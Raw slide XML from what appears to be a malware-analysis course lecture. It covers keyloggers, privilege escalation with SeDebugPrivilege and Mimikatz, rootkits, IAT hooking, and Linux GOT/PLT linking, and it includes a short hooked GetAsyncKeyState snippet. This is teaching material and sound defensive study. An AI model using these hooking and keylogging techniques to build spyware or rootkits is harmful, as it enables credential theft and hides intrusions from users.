              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> in protected mode (via registry) with a white-list of processes that are allowed access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Honey-credentials (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Thinkst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Canary)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 keystrokes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9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Records keystrokes so attacker can observe typed data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Kernel-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>keyloggers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Built into keyboard drivers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>User-space </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>keyloggers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Use Windows API to hook I/O functions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SetWindowsHookEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>) or poll for state of keys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GetForegroundWindow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GetAsyncKeyState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Example polling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: (Figure 11-3 and Example 11-4, p. 239, Loc. 5994)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Can look for key codes in assembly to identify key loggers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="1655476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11: Malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Behavior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443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Privilege escalation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Access to important calls such as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TerminateProcess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean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CreateRemoteThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> restricted to administrators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>But, most users run as local administrators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Malware uses privilege escalation for those that don't</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Exploit vulnerable code to obtain administrator privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Many malware frameworks include such exploits (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.metasploit.com/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Modify or forge security token of a process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> "Golden Ticket" for Kerberos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796722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SeDebugPrivilege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AdjustTokenPrivileges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Initially used as a tool for system-level debugging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use any privilege execution vulnerability to set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SeDebugPrivilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in order to get elevated privileges permanently (Listing 11-6, p. 246, Loc. 6172)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240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Covering tracks – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rootkits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Hide malicious activity and disable critical functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rootkits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> are kernel-mode to run at the same level as anti-virus/anti-malware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5892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rootkit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Disable or modify anti-virus process to prevent proper function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Disable software updates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Hide files, processes, network connections, open file descriptors, resource usage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>e.g. hide from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, top, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>lsof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>netstat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Modify boot loader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Have boot loader apply patches to kernel before loading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Modify on-disk kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Modify boot loader to allow new kernel to pass integrity check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Modify registry to install</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Install hooks on boot via run key in registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Must hide key from anti-virus after installation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37099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hooking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Mechanism commonly used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>rootkits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> to redirect function calls to injected attack code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Replaces legitimate function with alternative one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open, read, close,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fstat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lseek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fork,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munmap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valloc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vm_allocate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mach_vm_allocate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mach_vm_map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free,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execve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9189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 hooking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general methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Function table hooking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Run-time data structures that contain function pointers that are invoked during program execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hot patching function invocation (inline hooking)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Modify JMP/CALL targets in code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Modify function prologues to add detour to trampoline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189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04641" y="247706"/>
            <a:ext cx="8716320" cy="78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endParaRPr lang="en-US" altLang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="280099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28960" y="2667160"/>
            <a:ext cx="2895840" cy="1296136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Application code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push &lt;call parms&gt;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call [imp_InternetConnect]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28960" y="4800024"/>
            <a:ext cx="2895840" cy="1296136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Import Address Table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InternetConnect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InternetAutodial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InternetErrorDlg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294561" y="3961857"/>
            <a:ext cx="1440" cy="83816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 flipV="1">
            <a:off x="3123361" y="3032958"/>
            <a:ext cx="2437920" cy="201045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562720" y="2667160"/>
            <a:ext cx="2895840" cy="1752664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InternetConnect()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push ebp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lea ebp, [esp+var_5 8]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sub esp, 29Ch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table hooking (IAT)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Import Address Table (IAT) used to call functions in libraries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4817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IAT hooking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Modify IAT to hijack a DLL call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Load rootkit hook function into memory </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Replace target function’s address in the IAT with address of hook function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Hook function invokes original function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Figure 11-4, p. 247, Loc. 6226</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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0161" y="3352800"/>
            <a:ext cx="2895840" cy="1296136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Application code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push &lt;call parms&gt;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call [imp_InternetConnect]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0161" y="5487104"/>
            <a:ext cx="2895840" cy="1296136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Import Address Table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InternetConnect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InternetAutodial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jmp InternetErrorDlg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30721" y="5716088"/>
            <a:ext cx="319680" cy="45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itchFamily="16" charset="0"/>
              </a:rPr>
              <a:t>x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447201" y="4648937"/>
            <a:ext cx="1440" cy="83816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3276001" y="3720038"/>
            <a:ext cx="2437920" cy="2010451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90400" y="6019960"/>
            <a:ext cx="1523520" cy="609184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF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Rootkit Code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713921" y="3352800"/>
            <a:ext cx="2895840" cy="1752664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InternetConnect()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push ebp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lea ebp, [esp+var_5 8]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sub esp, 29Ch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300">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…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1300">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/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3276000" y="6248944"/>
            <a:ext cx="914400" cy="1441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V="1">
            <a:off x="4952161" y="3871255"/>
            <a:ext cx="761760" cy="2163107"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="936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003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IAT hooking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Details in book…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Locate import section from IAT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find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IMAGE_IMPORT_DESCRIPTOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> chunk of DLL that exports that function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Locate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IMAGE_THUNK_DATA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> which holds original address of imported function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Replace address in IAT to point to your function and have your function eventually call the original</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="2208398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IAT hooking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Detection problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Legitimate hooking common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Methods such as DLL forwarding makes benign vs. malicious hooks hard to discern</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Late binding of IAT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Function addresses sometimes not resolved until called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reduces amount of initial overhead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But, won’t know what the legitimate values should be!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8398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err="1" smtClean="0"/>
              <a:t>Downloaders</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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Backdoors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Credential stealers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Privilege escalation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Covering tracks (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rootkits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) 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 smtClean="0"/>
              <a:t>Persistence mechanisms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11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IAT targets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DLLs commonly used at run-time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kernel32.dll, user32.dll, gui32.dll, advapi.dll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kernel32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> loaded into private address space between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0x00010000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0x7FFE0000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Example: Hiding files in a directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Replace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FindFirstFile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FindNextFile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in kernel32 to skip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Other DLLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>DirectX/OpenGL APIs and time functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Typically hooked to implement cheating in on-line games</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Winsock API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Hooked to monitor network traffic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64534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library hook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Hook keyboard/DirectInput APIs to obtain keyboard/mouse events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GetKeyboardState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GetKeyState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GetDeviceState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90600" y="3313789"/>
            <a:ext cx="6971577" cy="353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SHORT WINAPI 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FakeGetAsyncKeyState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int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vKey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)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{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SHORT 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nResult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 = 0;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if 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g_bNeedMP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) {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if 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vKey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 == VK_M) {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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nResult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|= 0x8000; //’M’ pressed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	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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>g_bNeedMP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= FALSE;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}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="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}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else</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nResult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= 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RealGetAsyncKeyState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(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vKey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);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//...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/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66"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nResult</a:t>
            </a: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1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000066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283486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Library hooks in Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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Late binding and linking via function pointer table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Link upon first invocation of the function by program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Avoids linking a function that a program does not call, avoids linking all functions at load time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Two data structures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Global Offset Table (GOT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Array for storing addresses of library functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Uninitialized at start of program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Each entry instead points to code that invokes linker (to resolve address upon first invocation of function)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Linker then replaces itself with actual function address for subsequent invocations of the function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Procedure link table (PLT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Code in .text section that invokes both the linker and the library function being called</a:t>
            </a:r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/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="685800" y="228600"/>
            <a:ext cx="3261946" cy="1846385"/>
            <a:chOff x="685800" y="228600"/>
            <a:chExt cx="3261946" cy="1846385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685800" y="228600"/>
              <a:ext cx="3261946" cy="18463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algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New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88435" y="788333"/>
              <a:ext cx="3097765" cy="12251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GOT[0]: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.dynamic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GOT[1]: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addr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of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reloc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entries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GOT[2]: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dynamic linker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GOT[3]: </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1200" b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0x4005b6  </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="11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sys startup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GOT[4]: 0x4005c6  </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="110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</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1100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printf</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="110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()=&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1100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plt</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="11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GOT[5]: 0x4005d6  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t># exit()=&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" i="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>plt</a:t>
              </a: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30" name="Text Box 119"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="719276" y="536331"/>
              <a:ext cx="218034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Global offset table (GOT)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31" name="Text Box 119"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="685800" y="228600"/>
              <a:ext cx="129875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Data segment</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p: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85799" y="2198077"/>
            <a:ext cx="3464170" cy="283112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 anchorCtr="0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endParaRPr lang="sk-SK" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="sk-SK" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>callq 0x4005c0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Box 119"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2198077"/>
            <a:ext cx="13484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 i="1" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:t>Code segment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
              <a:latin typeface="Helvetica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54958" y="3244362"/>
            <a:ext cx="3069696" cy="17232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200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t># PLT[0]: call dynamic linker </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" i="1" dirty="0">
              <a:latin typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>4005a0: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>pushq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> *GOT[1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>4005a6: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*GOT[2]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
